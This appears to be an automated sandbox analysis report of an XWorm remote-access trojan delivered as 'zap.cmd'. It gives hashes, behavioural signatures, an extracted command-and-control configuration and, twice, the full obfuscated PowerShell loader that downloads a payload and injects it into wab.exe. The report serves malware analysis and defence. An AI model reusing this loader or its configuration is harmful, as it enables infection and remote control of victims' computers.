Analysis
-
max time kernel
146s -
max time network
145s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
23-05-2024 16:37
Static task
static1
Behavioral task
behavioral1
Sample
zap.cmd
Resource
win7-20240508-en
General
-
Target
zap.cmd
-
Size
6KB
-
MD5
0b65dcbdc755a516181f47d69f5aee10
-
SHA1
fc9319ec254c2be1b7ba5174d36d142c1ce20440
-
SHA256
00c866d489bd11732441171441b8db0a135c76bdb7bf5c3adb4da66e97dbed43
-
SHA512
e37aba32337a5bf8793721d8d9b9582c906b9820ace2a831d1f6e9548e6631942df0bdf6b56f07c1420fa7ade2d3a1e34bb27cab4ddc7d57a42672919f1ead1c
-
SSDEEP
96:vEWuwXqdcs0faFF/oW8NYEpyGakOwJyZLLi8lTxd7Qhn004g6bnecFhZ3WjS:vurF8NY8yGywAL2Ox5QV004gIFhn
Malware Config
Extracted
xworm
3.1
xgmn934.duckdns.org:8896
2utLZrxcByvppTdF
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/2020-87-0x00000000009E0000-0x00000000009EE000-memory.dmp family_xworm -
Blocklisted process makes network request 5 IoCs
Processes:
powershell.exeflow pid process 3 2072 powershell.exe 5 2072 powershell.exe 7 2072 powershell.exe 9 2072 powershell.exe 11 2072 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
wab.exepid process 2020 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exewab.exepid process 1884 powershell.exe 2020 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 1884 set thread context of 2020 1884 powershell.exe wab.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exewab.exepid process 2072 powershell.exe 1884 powershell.exe 1884 powershell.exe 2020 wab.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid process 1884 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exewab.exedescription pid process Token: SeDebugPrivilege 2072 powershell.exe Token: SeDebugPrivilege 1884 powershell.exe Token: SeDebugPrivilege 2020 wab.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
wab.exepid process 2020 wab.exe -
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
cmd.exepowershell.exepowershell.exedescription pid process target process PID 1088 wrote to memory of 2072 1088 cmd.exe powershell.exe PID 1088 wrote to memory of 2072 1088 cmd.exe powershell.exe PID 1088 wrote to memory of 2072 1088 cmd.exe powershell.exe PID 2072 wrote to memory of 2728 2072 powershell.exe cmd.exe PID 2072 wrote to memory of 2728 2072 powershell.exe cmd.exe PID 2072 wrote to memory of 2728 2072 powershell.exe cmd.exe PID 2072 wrote to memory of 1884 2072 powershell.exe powershell.exe PID 2072 wrote to memory of 1884 2072 powershell.exe powershell.exe PID 2072 wrote to memory of 1884 2072 powershell.exe powershell.exe PID 2072 wrote to memory of 1884 2072 powershell.exe powershell.exe PID 1884 wrote to memory of 2784 1884 powershell.exe cmd.exe PID 1884 wrote to memory of 2784 1884 powershell.exe cmd.exe PID 1884 wrote to memory of 2784 1884 powershell.exe cmd.exe PID 1884 wrote to memory of 2784 1884 powershell.exe cmd.exe PID 1884 wrote to memory of 2020 1884 powershell.exe wab.exe PID 1884 wrote to memory of 2020 1884 powershell.exe wab.exe PID 1884 wrote to memory of 2020 1884 powershell.exe wab.exe PID 1884 wrote to memory of 2020 1884 powershell.exe wab.exe PID 1884 wrote to memory of 2020 1884 powershell.exe wab.exe PID 1884 wrote to memory of 2020 1884 powershell.exe wab.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\zap.cmd"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "$Monostelous = 1;$Fomented='Sub';$Fomented+='strin';$Fomented+='g';Function Upstair91($Contrive){$Noontide=$Contrive.Length-$Monostelous;For($Bortskaffelsesmetode=5;$Bortskaffelsesmetode -lt $Noontide;$Bortskaffelsesmetode+=6){$Savnes+=$Contrive.$Fomented.Invoke( $Bortskaffelsesmetode, $Monostelous);}$Savnes;}function Skizoide($Cheanne){.($Scrimshorn) ($Cheanne);}$Lagenens=Upstair91 'automMSkvisoSamoazBi.eliNuclelMis ilSla,ea.vern/Vek.e5Unmag. Inf 0 Aaha Spade(UnrelW Im eiTatusnEk,pedTilkeoTrykkwIconos gumm vent.N VillTAtion Outse1 Efte0 Numm.,hoog0 Nabo;Skrot UkyndWcheiriP.ddenRokad6 Unde4Diara;Nanny Hus.exSelvg6Bikse4Konsu;Dagso Kor.fr Ego v Ripo:Helul1 lau2Overn1Perio. Hove0Genre) ,ugt ReplGRemnfeCor.ecPre,okNonvaoAfpas/Myste2Diaer0Lre r1Trich0Svanh0Pauci1condu0op.ak1,elss SemitF Oilsi,asserLu.thePriesf UoploLittex G.de/Snr l1 Caud2,hole1 .pre. Lobb0Savou ';$Unrevengingly166=Upstair91 'PeepiU Fl es,ndisePerv r Pins- Al,oAapprigSpadeeFil,nnGenavtNonfe ';$Stot=Upstair91 'ren rhBevistKedeltNiellpFortrsFotom:Selvh/ Acke/Bjergwfilbew.oncowBilla.Ov rss SisaeSamarnRefridE melsndvenpStimea Sangc Bukse Bes,.TempecCero,oPizzimMaste/BenaapKviltrstangofluff/AppoidProcelPrint/Va ut5Tet amCirku5OpspraReset1SolfauOp ys ';$Detonate=Upstair91 ',nthr>opbev ';$Scrimshorn=Upstair91 'Latkeis.igpe ballxKompr ';$Pelagia123='Tordnes';$Udpressede = Upstair91 'CirereTredic StaihSvrscoMetr. Filmm%Vildka A,phplill,pEstradR,misaPersptmanu.aInter%Bre,s\RestiBGenn,eEkseklVold eSoogejU,drarEdg,miFolkenSkorsgSt.nds PunctLope.iInduslbacitsHenhrtUnde.aKrgebn Bigfdfarvee .opon nomie KontsTyvep.SammeU Turbn Ta zjVeggi appli&R.dio&Udlov FikseDrypncUforuh CoinoAnde. Te,rt,fslu ';Skizoide (Upstair91 ' Ba d$Hon.rg Peril .outo GebrbSulfoa udsklSypho:kunneSRigsbk,interSynkats,emme M skr .ueleFlagegBiliniInform MoopeCinchnHovedtD trse SemitrneresLandi=Arbe,(Su,recReflemThinodTj.ne Medit/SpkhucTa.ul Amtsk$S adsUGrabbd HelspW,ener RenteDickysflorisS gareElderd EtlyeL,ane)maler ');Skizoide (Upstair91 'Ra,le$Sabelg ForslSloppo Ge sbKo.teaGrae,l Trac:spredBO.rejeTautnsIliadtRumvgrM risesam enStyrtdEftereCrowdsuropf=Vnget$Gr geSTvangtSm leoBan.stBlo.s.Poulis PhalpGrimrlD,visiDebittKamuf(Chest$L.cidDAdelseLydentMatteoCamern rackaSammetSiklie page) Redo ');$Stot=$Bestrendes[0];$songtress= (Upstair91 'Fri b$ StegglaanslLimitoStd ubInitiaGroenlAande: SkakS ,carpDundye MusocBi,tekVaretl FavoeCovendpayba= For,NSelvmeEnkepwLyrik-SekstO D,ukb.ommajTubuleExci.cOrigitBandl RouleSHj.teyRendes KlbetVaasee istimSecco.VirgiNoddf eforhit Jagg. oitfWTiltueShakeb RefrCProcelTerm,iJassieStrafnun.ott');$songtress+=$Skrteregimentets[1];Skizoide ($songtress);Skizoide (Upstair91 'Inca.$ stinSOvervpCarboephiltcA.sinkBo.bll.aveteKnackdEwder.PolisHHalvmeLe inaBije,dShik,e olyr Tagms Blg [Visc $ LudhUFhovenPy,pnrKole eRejsevZooloeephebnHomilgUd.kiiRe,hinme epgU.homlFodb,yBarog1Cepha6Wolfe6Ru,tp] Pen,=Hom g$Vol,mLCl,quaVand.g LyseeZi.kbnVejreeDislen IndbsAfhen ');$Skriftfontene=Upstair91 ' obeg$ RepeSNadjapSchnaeSkruecPupilkCrinalUnbreeAutocdbandl.AmritDdrossoFy.baw,oachnOverslc,athoStreja Toold,etirFTekstiFaseil.ilsveLysen(Aigre$WeediSKonvotPlo moMa,totNonau,popul$UnlivI sig,nTur,etTrut eCoenan PrtesPavi iKvrkno Stu,n Gorga LeaclTr nc)mbels ';$Intensional=$Skrteregimentets[0];Skizoide (Upstair91 'Ra po$S.ruvg Fo hlmurbro Ci.ibDestiaaestelDre,n:C,nsueBugvgmResole ForseStartrTrdniaKirsetBoldbe CorusCerat=spiri(SekstTManedeTrillsSkih.tUnpre- Br.sPGaskoa igedtdekath Refe ,agso$M.gaaIBegranBrt etBl,ndeNodalnSkov,sAflysiSpotto o,ernNonocaD ueslCyclo)Xylob ');while (!$emeerates) {Skizoide (Upstair91 'Sprj,$ sun.g l.anl FremoFormyb ElecaStre,lModek:MelleRHand,ebrnekbUdtrrsOndsilberyla Nonrg AfgieLaparrcage.i Phy.eBaskerLodurnKlapseOuthusTrans= tr,k$UmbratRek.irKogeru,ranseKloni ') ;Skizoide $Skriftfontene;Skizoide (Upstair91 'EquesSPneomtNonfeaUnparrhydrotBa,ue- TriaSKlipslS,aveeRebrueIndbyp fraa Pm g4Hirds ');Skizoide (Upstair91 'Emoti$m.colgOxindl J.ffoOverfbSyn aa Beakl idio:Aksele Alepm NeareDetaceanaphrEnlara .chitWri heUncoms D.ro=U.tag(UhudeT PytheDe its UttetT,yin-OversPPikniaFde.atTri,mh,usin Kuper$HurriI inivnco.mstOutqueNervsnSuccesBestriFerskoSportnMultiaProgrlChudd)Ste o ') ;Skizoide (Upstair91 'Prere$PortigObse,lSprogoA,modbDialeaVkkell Skri:S.derD opulaSignit LancaVaeltkHamleoRoqu.pTorskifolkeeProdurForel=Farve$charogPi.bilJ.risoRe,ktb ripua BoldlSlagt:StoittKorntv HeptiKrepts unestHyeniesvalem Forea.latfaBeroll Van.eSociatDgnbo+Komma+Emplo%,ltro$MolifBUngoleArsensIndfatDvrgbrForsvenucl nL gemdNym leForehsSup,l.Werchc,antaoMult,uErikonB,okitLreme ') ;$Stot=$Bestrendes[$Datakopier];}$Medicean=328833;$Edifyingly=28336;Skizoide (Upstair91 'Def n$Palaeg UddelanthroSeriebWaygoachapalUniax:IgnorSPrisoiAdorip.oronpHyperepaa.in oderi Un ipOverdp VouceMohawrbunkis.acif .owkn= Anti SedaGNondeeCoadjt C.nz-Bo,tvC H,shoUra onunappt Are eo,erdnImmigt Spoi Apu,$ MistITeg,enDo.zat ImmueOpmrknTranss GodhitredkoProtonElephastuntlIndse ');Skizoide (Upstair91 'Squin$NainsgCartol fprvoSentibSquawaTrvl,l Crem:ser.iVGroe,iForgnb rdkirAf,oraAs,ettRavneiTaupeoM.slanBasti unsol=Glans Rembo[ ,ephSVaarbyAnostsChieftTempeeN.nvamback,.Coni.CRilleoSkursnTeg,iv SelsealmocrBar etTrvem]Backl:Bopls: AssiFGulp rIndreoUtaalm,tenkBSan.ta LkkesVensteteolo6Fordu4AtomkSTenortUnamirPr.gri Eften ,adigProwe( Tera$CurraSPeritiSvi.gpCountpSnvreePodern ForaiCl mbpVarmepMosque Hyd r Bej.sLastb)konst ');Skizoide (Upstair91 ' M,cr$ rangUnsa,l SkoloH,klebNon,naDemenl Peop:DarkeSOscitu Unsmcdickic .breeTransspo,dwdHa.vea DesptT,lkna L ngm FronaE.lust.ornueT.berrRelegsPre.o Poste=Forsy Askeb[,elikSThingyVenacsUdtagtIndigeSgnehmCook,.SelvlTBr iseScuttxKlabatSolec.EfterEstdtnn KemscTlperoRrhatd CaliiCacomnS.rorg ,lat]Carca: Popu:GowidAVindeSSleepCCistvIOve,sINud e.CapriGstamteSignot CondSSlad.tIsomorVortiiHvortnTidskgadfix(Skues$ kontVvilheiIdiotbFasturIndiva Lovpt,randi.ekunoAlkahnStyre)Vermi ');Skizoide (Upstair91 ' Jrun$Zi,akgAutoglPuanboInforbR,ppeaOpiatlUdkom:AbstiL TopgiB aisvCituasPurisv ProliCigarg L,setUrbatiRenh,g QuineRimelsSalve=Plasm$F ltrS .hinuBustec I,itcUn.eseFortas randd afn aUtr,ltForsuaColpomFlappaFj,rntFormueSedderUdfrdsUdsli.Ki.bosrwandu SnurbEnkepsToetotBridgrAtheniRentenHa,legUndiv(Di,mi$,mstaMMachaeZinkedTrouviNordbcProtoe DobbaGlessnUigen, H,rs$LonghEAndend OveriGe esfMotoryDawisi SjlenImitagunmuflInt ryNondi)Krlh. ');Skizoide $Livsvigtiges;"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belejringstilstandenes.Unj && echo t"3⤵
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Monostelous = 1;$Fomented='Sub';$Fomented+='strin';$Fomented+='g';Function Upstair91($Contrive){$Noontide=$Contrive.Length-$Monostelous;For($Bortskaffelsesmetode=5;$Bortskaffelsesmetode -lt $Noontide;$Bortskaffelsesmetode+=6){$Savnes+=$Contrive.$Fomented.Invoke( $Bortskaffelsesmetode, $Monostelous);}$Savnes;}function Skizoide($Cheanne){.($Scrimshorn) ($Cheanne);}$Lagenens=Upstair91 'automMSkvisoSamoazBi.eliNuclelMis ilSla,ea.vern/Vek.e5Unmag. Inf 0 Aaha Spade(UnrelW Im eiTatusnEk,pedTilkeoTrykkwIconos gumm vent.N VillTAtion Outse1 Efte0 Numm.,hoog0 Nabo;Skrot UkyndWcheiriP.ddenRokad6 Unde4Diara;Nanny Hus.exSelvg6Bikse4Konsu;Dagso Kor.fr Ego v Ripo:Helul1 lau2Overn1Perio. Hove0Genre) ,ugt ReplGRemnfeCor.ecPre,okNonvaoAfpas/Myste2Diaer0Lre r1Trich0Svanh0Pauci1condu0op.ak1,elss SemitF Oilsi,asserLu.thePriesf UoploLittex G.de/Snr l1 Caud2,hole1 .pre. Lobb0Savou ';$Unrevengingly166=Upstair91 'PeepiU Fl es,ndisePerv r Pins- Al,oAapprigSpadeeFil,nnGenavtNonfe ';$Stot=Upstair91 'ren rhBevistKedeltNiellpFortrsFotom:Selvh/ Acke/Bjergwfilbew.oncowBilla.Ov rss SisaeSamarnRefridE melsndvenpStimea Sangc Bukse Bes,.TempecCero,oPizzimMaste/BenaapKviltrstangofluff/AppoidProcelPrint/Va ut5Tet amCirku5OpspraReset1SolfauOp ys ';$Detonate=Upstair91 ',nthr>opbev ';$Scrimshorn=Upstair91 'Latkeis.igpe ballxKompr ';$Pelagia123='Tordnes';$Udpressede = Upstair91 'CirereTredic StaihSvrscoMetr. Filmm%Vildka A,phplill,pEstradR,misaPersptmanu.aInter%Bre,s\RestiBGenn,eEkseklVold eSoogejU,drarEdg,miFolkenSkorsgSt.nds PunctLope.iInduslbacitsHenhrtUnde.aKrgebn Bigfdfarvee .opon nomie KontsTyvep.SammeU Turbn Ta zjVeggi appli&R.dio&Udlov FikseDrypncUforuh CoinoAnde. Te,rt,fslu ';Skizoide (Upstair91 ' Ba d$Hon.rg Peril .outo GebrbSulfoa udsklSypho:kunneSRigsbk,interSynkats,emme M skr .ueleFlagegBiliniInform MoopeCinchnHovedtD trse SemitrneresLandi=Arbe,(Su,recReflemThinodTj.ne Medit/SpkhucTa.ul Amtsk$S adsUGrabbd HelspW,ener RenteDickysflorisS gareElderd EtlyeL,ane)maler ');Skizoide (Upstair91 'Ra,le$Sabelg ForslSloppo Ge sbKo.teaGrae,l Trac:spredBO.rejeTautnsIliadtRumvgrM risesam enStyrtdEftereCrowdsuropf=Vnget$Gr geSTvangtSm leoBan.stBlo.s.Poulis PhalpGrimrlD,visiDebittKamuf(Chest$L.cidDAdelseLydentMatteoCamern rackaSammetSiklie page) Redo ');$Stot=$Bestrendes[0];$songtress= (Upstair91 'Fri b$ StegglaanslLimitoStd ubInitiaGroenlAande: SkakS ,carpDundye MusocBi,tekVaretl FavoeCovendpayba= For,NSelvmeEnkepwLyrik-SekstO D,ukb.ommajTubuleExci.cOrigitBandl RouleSHj.teyRendes KlbetVaasee istimSecco.VirgiNoddf eforhit Jagg. oitfWTiltueShakeb RefrCProcelTerm,iJassieStrafnun.ott');$songtress+=$Skrteregimentets[1];Skizoide ($songtress);Skizoide (Upstair91 'Inca.$ stinSOvervpCarboephiltcA.sinkBo.bll.aveteKnackdEwder.PolisHHalvmeLe inaBije,dShik,e olyr Tagms Blg [Visc $ LudhUFhovenPy,pnrKole eRejsevZooloeephebnHomilgUd.kiiRe,hinme epgU.homlFodb,yBarog1Cepha6Wolfe6Ru,tp] Pen,=Hom g$Vol,mLCl,quaVand.g LyseeZi.kbnVejreeDislen IndbsAfhen ');$Skriftfontene=Upstair91 ' obeg$ RepeSNadjapSchnaeSkruecPupilkCrinalUnbreeAutocdbandl.AmritDdrossoFy.baw,oachnOverslc,athoStreja Toold,etirFTekstiFaseil.ilsveLysen(Aigre$WeediSKonvotPlo moMa,totNonau,popul$UnlivI sig,nTur,etTrut eCoenan PrtesPavi iKvrkno Stu,n Gorga LeaclTr nc)mbels ';$Intensional=$Skrteregimentets[0];Skizoide (Upstair91 'Ra po$S.ruvg Fo hlmurbro Ci.ibDestiaaestelDre,n:C,nsueBugvgmResole ForseStartrTrdniaKirsetBoldbe CorusCerat=spiri(SekstTManedeTrillsSkih.tUnpre- Br.sPGaskoa igedtdekath Refe ,agso$M.gaaIBegranBrt etBl,ndeNodalnSkov,sAflysiSpotto o,ernNonocaD ueslCyclo)Xylob ');while (!$emeerates) {Skizoide (Upstair91 'Sprj,$ sun.g l.anl FremoFormyb ElecaStre,lModek:MelleRHand,ebrnekbUdtrrsOndsilberyla Nonrg AfgieLaparrcage.i Phy.eBaskerLodurnKlapseOuthusTrans= tr,k$UmbratRek.irKogeru,ranseKloni ') ;Skizoide $Skriftfontene;Skizoide (Upstair91 'EquesSPneomtNonfeaUnparrhydrotBa,ue- TriaSKlipslS,aveeRebrueIndbyp fraa Pm g4Hirds ');Skizoide (Upstair91 'Emoti$m.colgOxindl J.ffoOverfbSyn aa Beakl idio:Aksele Alepm NeareDetaceanaphrEnlara .chitWri heUncoms D.ro=U.tag(UhudeT PytheDe its UttetT,yin-OversPPikniaFde.atTri,mh,usin Kuper$HurriI inivnco.mstOutqueNervsnSuccesBestriFerskoSportnMultiaProgrlChudd)Ste o ') ;Skizoide (Upstair91 'Prere$PortigObse,lSprogoA,modbDialeaVkkell Skri:S.derD opulaSignit LancaVaeltkHamleoRoqu.pTorskifolkeeProdurForel=Farve$charogPi.bilJ.risoRe,ktb ripua BoldlSlagt:StoittKorntv HeptiKrepts unestHyeniesvalem Forea.latfaBeroll Van.eSociatDgnbo+Komma+Emplo%,ltro$MolifBUngoleArsensIndfatDvrgbrForsvenucl nL gemdNym leForehsSup,l.Werchc,antaoMult,uErikonB,okitLreme ') ;$Stot=$Bestrendes[$Datakopier];}$Medicean=328833;$Edifyingly=28336;Skizoide (Upstair91 'Def n$Palaeg UddelanthroSeriebWaygoachapalUniax:IgnorSPrisoiAdorip.oronpHyperepaa.in oderi Un ipOverdp VouceMohawrbunkis.acif .owkn= Anti SedaGNondeeCoadjt C.nz-Bo,tvC H,shoUra onunappt Are eo,erdnImmigt Spoi Apu,$ MistITeg,enDo.zat ImmueOpmrknTranss GodhitredkoProtonElephastuntlIndse ');Skizoide (Upstair91 'Squin$NainsgCartol fprvoSentibSquawaTrvl,l Crem:ser.iVGroe,iForgnb rdkirAf,oraAs,ettRavneiTaupeoM.slanBasti unsol=Glans Rembo[ ,ephSVaarbyAnostsChieftTempeeN.nvamback,.Coni.CRilleoSkursnTeg,iv SelsealmocrBar etTrvem]Backl:Bopls: AssiFGulp rIndreoUtaalm,tenkBSan.ta LkkesVensteteolo6Fordu4AtomkSTenortUnamirPr.gri Eften ,adigProwe( Tera$CurraSPeritiSvi.gpCountpSnvreePodern ForaiCl mbpVarmepMosque Hyd r Bej.sLastb)konst ');Skizoide (Upstair91 ' M,cr$ rangUnsa,l SkoloH,klebNon,naDemenl Peop:DarkeSOscitu Unsmcdickic .breeTransspo,dwdHa.vea DesptT,lkna L ngm FronaE.lust.ornueT.berrRelegsPre.o Poste=Forsy Askeb[,elikSThingyVenacsUdtagtIndigeSgnehmCook,.SelvlTBr iseScuttxKlabatSolec.EfterEstdtnn KemscTlperoRrhatd CaliiCacomnS.rorg ,lat]Carca: Popu:GowidAVindeSSleepCCistvIOve,sINud e.CapriGstamteSignot CondSSlad.tIsomorVortiiHvortnTidskgadfix(Skues$ kontVvilheiIdiotbFasturIndiva Lovpt,randi.ekunoAlkahnStyre)Vermi ');Skizoide (Upstair91 ' Jrun$Zi,akgAutoglPuanboInforbR,ppeaOpiatlUdkom:AbstiL TopgiB aisvCituasPurisv ProliCigarg L,setUrbatiRenh,g QuineRimelsSalve=Plasm$F ltrS .hinuBustec I,itcUn.eseFortas randd afn aUtr,ltForsuaColpomFlappaFj,rntFormueSedderUdfrdsUdsli.Ki.bosrwandu SnurbEnkepsToetotBridgrAtheniRentenHa,legUndiv(Di,mi$,mstaMMachaeZinkedTrouviNordbcProtoe DobbaGlessnUigen, H,rs$LonghEAndend OveriGe esfMotoryDawisi SjlenImitagunmuflInt ryNondi)Krlh. ');Skizoide $Livsvigtiges;"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belejringstilstandenes.Unj && echo t"4⤵
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015Filesize
344B
MD57d016db11465393e9c2c18ed06d9c43b
SHA1a83beea9c2bec3a13ba38b0bceee169ecb400b6e
SHA256b3eb20694b28353926f0b112d1d8133a664d566e4037c6245762efcba8f2fced
SHA51232bb2a60e3680413e86f51a56a8c6055bb6c4ce4c44b7eba27cebcd756c2d95d7aaf4b6812a2fc538e5534be5d931cda3cac683d03cddf1ff7cd4599513a4078
-
C:\Users\Admin\AppData\Local\Temp\Cab1B40.tmpFilesize
68KB
MD529f65ba8e88c063813cc50a4ea544e93
SHA105a7040d5c127e68c25d81cc51271ffb8bef3568
SHA2561ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa
-
C:\Users\Admin\AppData\Local\Temp\Tar1B53.tmpFilesize
177KB
MD5435a9ac180383f9fa094131b173a2f7b
SHA176944ea657a9db94f9a4bef38f88c46ed4166983
SHA25667dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA5121a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a
-
C:\Users\Admin\AppData\Roaming\Belejringstilstandenes.UnjFilesize
465KB
MD561708c02a92801dea7267daf2300d321
SHA15414b3aed956e83fb5f196f44ce5888dcfd6e4a9
SHA2563b1e99b27d0ac212ee8597aa77c4f3d242a198c06cbf5fc536b0e635a9f203f7
SHA5125787bc03913eac9e7082657d2420e66ed0e7a481e75cccad7f077ee347146ccce06534ed8f7e5105895f9c4e3e011f74fdcd03088eee5736713bc09bb9c3fe85
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9IYO6Z8QHG9DSMKWARW3.tempFilesize
7KB
MD5fcf459379405f677338d15dacec2b52d
SHA12f51bf094efd38f8814d2dc0f90ed662cbfe5402
SHA256754e9c08096f729ff30fb5cdcf0af6a1d9f1e380488bfa033733b977abdf6741
SHA512751a641601ac482e1f4f39594ef604fc59dbfc393773180675b7e344a27e380c325fa632ec58e6a123c30f50cc40b19e66730cab4caf959c1813138b7fd90f0a
-
memory/1884-54-0x0000000006650000-0x000000000C429000-memory.dmpFilesize
93.8MB
-
memory/2020-87-0x00000000009E0000-0x00000000009EE000-memory.dmpFilesize
56KB
-
memory/2020-85-0x00000000009E0000-0x0000000001A42000-memory.dmpFilesize
16.4MB
-
memory/2020-58-0x00000000009E0000-0x0000000001A42000-memory.dmpFilesize
16.4MB
-
memory/2072-9-0x000007FEF5670000-0x000007FEF600D000-memory.dmpFilesize
9.6MB
-
memory/2072-10-0x000007FEF5670000-0x000007FEF600D000-memory.dmpFilesize
9.6MB
-
memory/2072-5-0x000000001B800000-0x000000001BAE2000-memory.dmpFilesize
2.9MB
-
memory/2072-55-0x000007FEF5670000-0x000007FEF600D000-memory.dmpFilesize
9.6MB
-
memory/2072-56-0x000007FEF592E000-0x000007FEF592F000-memory.dmpFilesize
4KB
-
memory/2072-4-0x000007FEF592E000-0x000007FEF592F000-memory.dmpFilesize
4KB
-
memory/2072-6-0x00000000028F0000-0x00000000028F8000-memory.dmpFilesize
32KB
-
memory/2072-8-0x000007FEF5670000-0x000007FEF600D000-memory.dmpFilesize
9.6MB
-
memory/2072-86-0x000007FEF5670000-0x000007FEF600D000-memory.dmpFilesize
9.6MB
-
memory/2072-7-0x000007FEF5670000-0x000007FEF600D000-memory.dmpFilesize
9.6MB